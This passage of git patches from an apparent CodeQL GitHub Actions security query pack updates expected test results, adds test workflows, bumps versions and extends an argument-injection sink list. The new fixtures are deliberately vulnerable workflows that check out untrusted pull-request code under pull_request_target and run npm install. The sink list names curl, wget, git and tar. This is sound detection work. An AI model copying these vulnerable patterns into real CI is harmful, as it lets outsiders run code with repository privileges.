then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | @@ -100,6 +95,7 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index e780af4107d..82602ee8ed8 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index d9e5d6be670..47a0dfc6bd3 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -6,7 +6,7 @@ jobs: steps: - name: Get PR number id: pr_number - if: ${{ github.event_name == 'issue_comment'}} + if: github.event_name == 'issue_comment' && github.repository_owner == 'foo' run: | PR_URL="${{ github.event.issue.pull_request.url }}" PR_NUMBER=${PR_URL##*/} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml new file mode 100644 index 00000000000..b98d7654998 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml new file mode 100644 index 00000000000..037a0eb79f9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.pull_request.head.repo.full_name == github.repository + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml new file mode 100644 index 00000000000..bcde60f55cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml new file mode 100644 index 00000000000..55aa0b41c6c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.event.workflow_run.head_repository.full_name == github.repository + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4dc2b53e591..f20fdc79829 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -262,7 +262,15 @@ edges | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 81a8c63c882..1d6122b3747 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,3 +18,5 @@ | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From c7fde2a40d87ec164b72990980eaf085e38bf8e5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:35:00 +0200 Subject: [PATCH 0553/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00d8e21c05d..d79107e06c6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.59 +version: 0.1.60 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 94468d4b96c..aeaae6dbb91 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.59 +version: 0.1.60 groups: [actions, queries] suites: codeql-suites extractor: javascript From 726392c8b7b65f6efadad21c1ef353c7b56d0fea Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Tue, 1 Oct 2024 09:48:16 +0200 Subject: [PATCH 0554/1267] Suppress `actions/cache-poisoning/code-injection` alerts covered by `actions/code-injection/critical` --- ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql | 3 ++- .../Security/CWE-349/CachePoisoningViaCodeInjection.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 411d0052d4b..fe49b2dd3b5 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -30,7 +30,8 @@ where check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not job.isPrivileged() and + // which is covered by `actions/code-injection/critical` + not job.isPrivilegedExternallyTriggerable(event) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(event) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index d9f659cbcc3..5c5c26edb4e 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -8,4 +8,3 @@ nodes subpaths #select | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | From ef37e3c59400ff117e577e669a6bb32b5cfd4b7f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 1 Oct 2024 14:22:08 +0200 Subject: [PATCH 0555/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d79107e06c6..af477fb9bf7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.60 +version: 0.1.61 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index aeaae6dbb91..7b8b9ef321c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.60 +version: 0.1.61 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4b74adec4b7165dc9f10c22dfff791055c3bcedf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:31:59 +0200 Subject: [PATCH 0556/1267] Account for branches filter as a way to prevent workflow_run to trigger on PRs from forks --- ql/lib/codeql/actions/ast/internal/Ast.qll | 11 ++++------- ql/lib/ext/config/argument_injection_sinks.yml | 7 +++++++ 2 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d4716f89e19..f2d3698597f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -722,13 +722,10 @@ class EventImpl extends AstNodeImpl, TEventNode { not this.getName() = "workflow_run" or this.getName() = "workflow_run" and - // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch - // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow - // but in that case, the triggering workflow will run in the context of the PR head branch - ( - not exists(this.getAPropertyValue("branches")) or - this.getAPropertyValue("branches").matches("%*%") - ) + // workflow_run cannot be externally triggered if the triggering workflow runs in the context of the default branch + // An attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // in that case, the triggering workflow will run in the context of the PR head branch + not exists(this.getAPropertyValue("branches")) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally this.getName() = "workflow_call" and diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 4588af0bf00..ab523c59303 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -3,7 +3,14 @@ extensions: pack: github/actions-all extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ + # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - ["(awk)(.*?)", 2, 3] + - ["(curl)(.*?)", 2, 3] + - ["(find)(.*?)", 2, 3] + - ["(git)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] + - ["(tar)(.*?)", 2, 3] + - ["(wget)(.*?)", 2, 3] + - ["(zip)(.*?)", 2, 3] From 2727bf5e2fdb220f266a0bc90675074c95548d13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:05 +0200 Subject: [PATCH 0557/1267] Add improved Bash script parser --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/Helper.qll | 100 +++++++++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ 3 files changed, 104 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 63f2552f582..a4c50ecf55b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -293,6 +293,10 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + + string getACommand() { result = super.getACommand() } + + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f9fa108ec3a..d6e3042ead3 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -54,7 +54,6 @@ predicate isBashParameterExpansion(string expr, string parameter, string operato ) } -// TODO, the followinr test fails bindingset[raw_content] predicate extractVariableAndValue(string raw_content, string key, string value) { exists(string regexp, string content | content = trimQuotes(raw_content) | @@ -246,10 +245,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -string partialFileContentRegexp() { - result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] -} - bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -257,7 +252,7 @@ predicate outputsPartialFileContent(string snippet) { // echo "FOO=$(> $GITHUB_ENV // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH - snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"]) + Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 } string defaultBranchNames() { @@ -310,3 +305,96 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + bindingset[script] + string getACommand(string script) { + exists(string stmt_, string stmt, string subline2, string cmd | + stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and + stmt = + [ + // $() command substitution + stmt_ + .regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) + .regexpReplaceAll("^\\$\\(", 